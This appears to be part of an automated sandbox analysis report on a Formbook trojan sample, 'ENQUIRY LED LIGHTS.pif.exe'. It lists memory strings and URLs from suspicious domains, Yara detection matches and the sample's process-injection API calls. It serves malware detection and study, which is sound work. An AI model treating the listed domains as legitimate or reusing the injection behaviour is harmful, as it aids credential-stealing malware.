            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?v
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.j
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.mi
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.min.js?
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/css/shortcodes
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/js/yith-wcan-s
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.3
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.m
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.m
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto-child/style.css?ver=6.6.2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/plugins.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme/shop/login-style/account-login.css?ver=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme/shop/other/woopage.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_shop.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_wpb.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/live-search/live-search.min.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/woocommerce-shipping-progress-bar/shippin
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/bootstrap.js?ver=5.0.1
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.magnific-popup.min.js?ver=1.1.0
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.selectric.min.js?ver=1.9.6
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/owl.carousel.min.js?ver=2.3.4
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/webfont.js
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme-async.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/js/woocommerce-theme.js?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-content/themes/porto/style.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/js/imagesloaded.min.js?ver=5.0.0
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.waidzeitcz.shop/xmlrpc.php
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2977288553.00000000026D3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.windowmart.online
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2977288553.00000000026D3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.windowmart.online/uftp/
            Source: ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10336
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000345B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: SearchFilterHost.exe, 00000008.00000003.2397502049.00000000082D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rankmath.com/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/BreadcrumbList
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org/ListItem
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/#person
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/#website
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/cart/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/comments/feed/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/contact-us/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/feed/
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/my-account/
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/shop/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wishlist/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-admin/admin-ajax.php
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/plugins/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/bootstrap.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/dynamic_style.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/shortcodes.css?ver=7.1.14
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/theme_css_vars.css?ver=7.1.14
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/wp-json/
            Source: SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.waidzeitcz.shop/xmlrpc.php?rsd

            E-Banking Fraud

            Source: Yara match, File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: initial sample, Static PE information: Filename: ENQUIRY LED LIGHTS.pif.exe
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0042CE6F NtClose,3_2_0042CE6F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52B60 NtClose,LdrInitializeThunk,3_2_02F52B60
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_02F52C70
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02F52DF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F535C0 NtCreateMutant,LdrInitializeThunk,3_2_02F535C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F54340 NtSetContextThread,3_2_02F54340
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F54650 NtSuspendThread,3_2_02F54650
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52AF0 NtWriteFile,3_2_02F52AF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52AD0 NtReadFile,3_2_02F52AD0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52AB0 NtWaitForSingleObject,3_2_02F52AB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52BF0 NtAllocateVirtualMemory,3_2_02F52BF0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52BE0 NtQueryValueKey,3_2_02F52BE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52BA0 NtEnumerateValueKey,3_2_02F52BA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52B80 NtQueryInformationFile,3_2_02F52B80
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52EE0 NtQueueApcThread,3_2_02F52EE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52EA0 NtAdjustPrivilegesToken,3_2_02F52EA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F52E80 NtReadVirtualMemory,3_2_02F52E80
